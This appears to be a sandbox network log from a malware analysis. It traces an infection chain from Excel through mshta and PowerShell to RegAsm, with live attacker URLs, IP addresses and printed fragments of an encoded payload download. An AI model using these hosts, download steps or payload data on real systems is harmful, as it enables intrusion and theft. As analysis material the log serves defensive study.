                                                                                                                                                                                                                    Data Ascii: Wzq1wANtTD20sMN7Sjp0MFNFRDH0kwMwPT1zU8M9ODpzo3MqNjYzo0MqMjCyktMBLjoycoMqJzSy4iMpIjFywgMCED/xcfMsHD5xwdMUHTzxYcM/GDuxEbMqGzox0ZMXGTkxsYMFGjUxkUM5ETKxkRMPETBw8PM6DT8wUOMdDT1w0MMGDzvwgLMxCjqwMKMcCjlwAJMKCDhw4HMeBzVwwEMDBTLwgAMDAAABgGADAFA/09PY/D0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    4192.168.2.2249172192.3.220.40802988C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.982055902 CEST463OUTGET /330/uh/newthingtobeonlinefor.hta HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    If-Modified-Since: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    If-None-Match: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.627368927 CEST275INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:01 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    ETag: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.2249175178.237.33.50801908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.791846991 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Oct 8, 2024 15:24:04.397444010 CEST1170INHTTP/1.1 200 OK
                                                                                                                                                                                                                    date: Tue, 08 Oct 2024 13:24:04 GMT
                                                                                                                                                                                                                    server: Apache
                                                                                                                                                                                                                    content-length: 962
                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    6192.168.2.2249177192.3.220.40803784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:24:20.820138931 CEST76OUTGET /330/RRCGGH.txt HTTP/1.1
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307277918 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:21 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:16:04 GMT
                                                                                                                                                                                                                    ETag: "a1000-623f1e913f4cf"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 659456
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                    Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307321072 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                                                                    Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307333946 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                                                                    Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307346106 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                                                                    Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307359934 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                                                                    Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307370901 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                                                                                                                                                                                    Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307427883 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                                                                                                                                                                                    Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307440042 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                                                                                                                                                                                    Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307451963 CEST1224INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                                                                                                                                                                                    Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.307466030 CEST1236INData Raw: 44 44 76 77 59 4c 4d 77 43 6a 71 77 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a
                                                                                                                                                                                                                    Data Ascii: DDvwYLMwCjqwUKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.312484980 CEST1236INData Raw: 63 78 4f 54 73 7a 44 37 73 77 4f 48 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61
                                                                                                                                                                                                                    Data Ascii: cxOTszD7swOHszA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyN


                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.2249161188.114.96.34433480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-08 13:23:39 UTC321OUTGET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-10-08 13:23:40 UTC1190INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:40 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nNA%2F94mrFeM0o8z12tVI479ojNzF7uujmDx48RMzw1me44659RScYKtg%2FgayT7QAxpwexT2TdvZdr1KS2HfP1TXCwQGDaVMWD2YOnUtCRR4SWS0hACSOYHe%2FWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf6725dce1a436f-EWR
                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                    2024-10-08 13:23:40 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.2249163188.114.97.34433764C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-08 13:23:42 UTC345OUTGET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-10-08 13:23:43 UTC1158INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:43 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFzBroaNfJMPj7rC2DAl1LP4RZ4d8cdcBHcVBudaE1yQbDkZiBTg09V%2FX3mzFB3Sg4bE8iJStQMMgP19zCLKTvBWEs0r3DlmFVjrc1fch9HmzmanSlsax%2BoBkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf6727108ef159f-EWR
                                                                                                                                                                                                                    2024-10-08 13:23:43 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.2249166207.241.227.2424433232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC117OUTGET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                                                                    Host: ia600102.us.archive.org
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:55 GMT
                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                    Content-Length: 6331693
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    ETag: "6704abca-609d2d"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15724800
                                                                                                                                                                                                                    Expires: Tue, 08 Oct 2024 19:23:55 GMT
                                                                                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                    Accept-Ranges: bytes
